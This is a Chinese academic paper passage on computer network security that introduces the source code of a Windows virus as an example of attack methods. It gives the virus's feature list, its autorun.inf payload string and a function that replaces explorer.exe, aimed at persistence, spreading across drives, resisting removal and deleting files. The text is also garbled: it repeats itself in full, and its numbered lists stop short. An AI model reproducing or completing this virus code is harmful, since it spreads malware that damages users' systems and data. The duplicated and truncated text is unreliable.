论文部分内容阅读
摘要:随着计算机网络技术的快速发展,网络安全日益成为人们关注的焦点。本文分析了影响网络安全的主要因素及攻击的主要方式,从管理和技术两方面就加强计算机网络安全提出了针对性的建议。
关键词:计算机网络;安全;管理;技术
中图分类号:TP393.08 文献标识码:A文章编号:1007-9599(2012)03-0000-02
Computer Network Security Analysis
Ma Chuan,Zhao Jing
(Shenyang Normal University,School of Software,Shenyang110034,China)
Abstract:With the rapid development of computer network technology,network security is increasingly becoming the focus of attention.This paper analyzes the main factors affecting network security and attack the main form of targeted recommendations on enhancing computer network security,management and technical aspects.
Keywords:Computer networks;Security;Management;Technology
一、影响网络安全的主要因素
计算机网络所面临的威胁是多方面的,既包括对网络中信息的威胁,也包括对网络中设备的威胁,但归结起来,主要有三点:一是人为的无意失误。如操作员安全配置不当造成系统存在安全漏洞,用户安全意识不强,口令选择不慎,将自己的帐号随意转借他人或与别人共享等都会给网络安全带来威胁。二是人为的恶意攻击。此外,软件公司的编程人员为便于维护而设置的软件“后门”也是不容忽视的巨大威胁,一旦“后门”洞开,别人就能随意进入系统,后果不堪设想。
二、计算机网络受攻击的主要形式
计算机网络被攻击,主要有六种形式。1.内部窃密和破坏。内部人员有意或无意的泄密、更改记录信息或者破坏网络系统。2.截收信息。攻击者可能通过搭线或在电磁辐射的范围内安装截收装置等方式,截获机密信息或通过对信息流和流向、通信频度和长度等参数的分析,推出有用的信息。3.非法访问。指未经授权使用网络资源或以未授权的方式使用网络资源,主要包括非法用户进入网络或系统进行违法操作和合法用户以未授权的方式进行操作。
下面简单的介绍一个简单的计算机病毒源代码:
(1)功能:
1.在所有磁盘的根目录生成svchost.com和autorun.inf文件
2.生成病毒体:
c:windowswjview32.com;c:windowsexplorer.exe;c:windowssystem32dllcacheexplorer.exe;c:windowssystemmsmouse.dll;c:windowssystem32cmdsys.sys;c:windowssystem32mstsc32.exe
3.病毒体c:windowsexplorer.exe感染原explorer.exe文件,使其不需要修改注册表做到启动时在explorer.exe前启动
4.修改注册表,在HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows
CurrentVersionRun设置自启动项(此操作不使用windowsAPI,防止用户对病毒体的发现,并实现并行执行)
5.生成的autorun.inf改变磁盘的打开方式,使其在windows2000以上的系统无论选择“打开”、“双击”、“资源管理器”等方式都无法打开分驱,而是以运行病毒的方式取而代之。
6.连锁能力,将病毒体相连,实现相连复制更新
7.使用进程不断调用进程,使得在任务管理里无法结束病毒进程
8.不断搜索磁盘,只要发现未感染病毒的一律感染,病毒删除后1秒内再建
9.生成垃圾文件(DESTORY_感染_任意数字)5个于C盘下
10.附带删除文件函数(为防止危害,本函数默认不执行)
(2)心代码:
/*
SK-CHINA
SVCHOST virus WRITE BY S.K
Compiler:
DEV-CPP 4.9.9.2
*/
/* SVCHOST.C*/
/* SVCHOST.EXE */
/* SVCHOST.COM */
#include /*标准输入输出*/
#include /*字符串操作*/
#include /*其它函数*/
#include /*进程控制*/
#include /*目录函数*/
#define SVCHOST_NUM 6 /*关键位置病毒复制数量*/
#define RUBBISH_NUM 5 /*垃圾文件数量*/
#define REMOVE_NUM 5 /*删除文件数*/
/*====================================================*/
/*
文件AUTORUN.INF内容:
1.自动运行SVCHOST.com
2.覆盖默认打开命令,使用病毒体作为新的打开方式
3.覆盖默认资源管理器命令,使病毒体作为新的命令方式
*/
char *autorun={“[AutoRun] open=”SVCHOST.com /s” shellopen=打开(&O)
shellopenCommand=”SVCHOST.com /s” shellexplore=资源管理器(&X)
shellexploreCommand=”SVCHOST.com /s””};
/*=====================================================*/
/*
添加注册表项:
1.自动运行生成病毒体C:windowswjview32.com
*/
char *regadd={“REGEDIT4
/*========================================================*/
/*
函数:通过explorer自动运行
成功返回0,失败返回1,2
*/
int autorun_explorer()
{
FILE *input;
if((input=fopen(“c:windowssystemexplorer.exe”,”rb”))!=NULL)
{
fclose(input);
remove(“c:windows$temp$”);
remove(“c:windowssystem32dllcache$temp$”);
return 1;
}
copy(“c:windowsexplorer.exe”,”c:windowssystemexplorer.exe”);
rename(“c:windowsexplorer.exe”,”c:windows$temp$”);
rename(“c:windowssystem32dllcacheexplorer.exe”,”c:windowssystem32
dllcache$temp$”);
if(copy(“SVCHOST.com”,”c:windowsexplorer.exe”)==0 && copy
(“SVCHOST.com”,”c:windowssystem32dllcacheexplorer.exe”)==0)
return 0;
else
return 2;
/*========================================================*/
/*
主程序 略
三、加强计算机网络安全的对策措施
(一)加强网络安全教育和管理。对工作人员结合机房、硬件、软件、数据和网络等各个方面安全问题,进行安全教育,提高工作人员的安全观念和责任心;加强业务、技术的培训,提高操作技能;教育工作人员严格遵守操作规程和各项保密规定,防止人为事故的发生。(二)运用网络加密技术。网络信息加密的目的是保护网内的数据、文件、口令和控制信息,保护网上传输的数据。加密数据传输主要有三种:1.链接加密。在网络节点间加密,在节点间传输加密的信息,传送到节点后解密,不同节点间用不同的密码。2.节点加密。与链接加密类似,不同的只是当数据在节点间传送时,不用明码格式传送,而是用特殊的加密硬件进行解密和重加密,这种专用硬件通常放置在安全保险箱中。
参考文献:
[1]杨义先.网络安全理论与技术[M].北京:人民邮电出版社,2003.
关键词:计算机网络;安全;管理;技术
中图分类号:TP393.08 文献标识码:A文章编号:1007-9599(2012)03-0000-02
Computer Network Security Analysis
Ma Chuan,Zhao Jing
(Shenyang Normal University,School of Software,Shenyang110034,China)
Abstract:With the rapid development of computer network technology,network security is increasingly becoming the focus of attention.This paper analyzes the main factors affecting network security and attack the main form of targeted recommendations on enhancing computer network security,management and technical aspects.
Keywords:Computer networks;Security;Management;Technology
一、影响网络安全的主要因素
计算机网络所面临的威胁是多方面的,既包括对网络中信息的威胁,也包括对网络中设备的威胁,但归结起来,主要有三点:一是人为的无意失误。如操作员安全配置不当造成系统存在安全漏洞,用户安全意识不强,口令选择不慎,将自己的帐号随意转借他人或与别人共享等都会给网络安全带来威胁。二是人为的恶意攻击。此外,软件公司的编程人员为便于维护而设置的软件“后门”也是不容忽视的巨大威胁,一旦“后门”洞开,别人就能随意进入系统,后果不堪设想。
二、计算机网络受攻击的主要形式
计算机网络被攻击,主要有六种形式。1.内部窃密和破坏。内部人员有意或无意的泄密、更改记录信息或者破坏网络系统。2.截收信息。攻击者可能通过搭线或在电磁辐射的范围内安装截收装置等方式,截获机密信息或通过对信息流和流向、通信频度和长度等参数的分析,推出有用的信息。3.非法访问。指未经授权使用网络资源或以未授权的方式使用网络资源,主要包括非法用户进入网络或系统进行违法操作和合法用户以未授权的方式进行操作。
下面简单的介绍一个简单的计算机病毒源代码:
(1)功能:
1.在所有磁盘的根目录生成svchost.com和autorun.inf文件
2.生成病毒体:
c:windowswjview32.com;c:windowsexplorer.exe;c:windowssystem32dllcacheexplorer.exe;c:windowssystemmsmouse.dll;c:windowssystem32cmdsys.sys;c:windowssystem32mstsc32.exe
3.病毒体c:windowsexplorer.exe感染原explorer.exe文件,使其不需要修改注册表做到启动时在explorer.exe前启动
4.修改注册表,在HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows
CurrentVersionRun设置自启动项(此操作不使用windowsAPI,防止用户对病毒体的发现,并实现并行执行)
5.生成的autorun.inf改变磁盘的打开方式,使其在windows2000以上的系统无论选择“打开”、“双击”、“资源管理器”等方式都无法打开分驱,而是以运行病毒的方式取而代之。
6.连锁能力,将病毒体相连,实现相连复制更新
7.使用进程不断调用进程,使得在任务管理里无法结束病毒进程
8.不断搜索磁盘,只要发现未感染病毒的一律感染,病毒删除后1秒内再建
9.生成垃圾文件(DESTORY_感染_任意数字)5个于C盘下
10.附带删除文件函数(为防止危害,本函数默认不执行)
(2)心代码:
/*
SK-CHINA
SVCHOST virus WRITE BY S.K
Compiler:
DEV-CPP 4.9.9.2
*/
/* SVCHOST.C*/
/* SVCHOST.EXE */
/* SVCHOST.COM */
#include
#include
#include
#include
#include
#define SVCHOST_NUM 6 /*关键位置病毒复制数量*/
#define RUBBISH_NUM 5 /*垃圾文件数量*/
#define REMOVE_NUM 5 /*删除文件数*/
/*====================================================*/
/*
文件AUTORUN.INF内容:
1.自动运行SVCHOST.com
2.覆盖默认打开命令,使用病毒体作为新的打开方式
3.覆盖默认资源管理器命令,使病毒体作为新的命令方式
*/
char *autorun={“[AutoRun] open=”SVCHOST.com /s” shellopen=打开(&O)
shellopenCommand=”SVCHOST.com /s” shellexplore=资源管理器(&X)
shellexploreCommand=”SVCHOST.com /s””};
/*=====================================================*/
/*
添加注册表项:
1.自动运行生成病毒体C:windowswjview32.com
*/
char *regadd={“REGEDIT4
/*========================================================*/
/*
函数:通过explorer自动运行
成功返回0,失败返回1,2
*/
int autorun_explorer()
{
FILE *input;
if((input=fopen(“c:windowssystemexplorer.exe”,”rb”))!=NULL)
{
fclose(input);
remove(“c:windows$temp$”);
remove(“c:windowssystem32dllcache$temp$”);
return 1;
}
copy(“c:windowsexplorer.exe”,”c:windowssystemexplorer.exe”);
rename(“c:windowsexplorer.exe”,”c:windows$temp$”);
rename(“c:windowssystem32dllcacheexplorer.exe”,”c:windowssystem32
dllcache$temp$”);
if(copy(“SVCHOST.com”,”c:windowsexplorer.exe”)==0 && copy
(“SVCHOST.com”,”c:windowssystem32dllcacheexplorer.exe”)==0)
return 0;
else
return 2;
/*========================================================*/
/*
主程序 略
三、加强计算机网络安全的对策措施
(一)加强网络安全教育和管理。对工作人员结合机房、硬件、软件、数据和网络等各个方面安全问题,进行安全教育,提高工作人员的安全观念和责任心;加强业务、技术的培训,提高操作技能;教育工作人员严格遵守操作规程和各项保密规定,防止人为事故的发生。(二)运用网络加密技术。网络信息加密的目的是保护网内的数据、文件、口令和控制信息,保护网上传输的数据。加密数据传输主要有三种:1.链接加密。在网络节点间加密,在节点间传输加密的信息,传送到节点后解密,不同节点间用不同的密码。2.节点加密。与链接加密类似,不同的只是当数据在节点间传送时,不用明码格式传送,而是用特殊的加密硬件进行解密和重加密,这种专用硬件通常放置在安全保险箱中。
参考文献:
[1]杨义先.网络安全理论与技术[M].北京:人民邮电出版社,2003.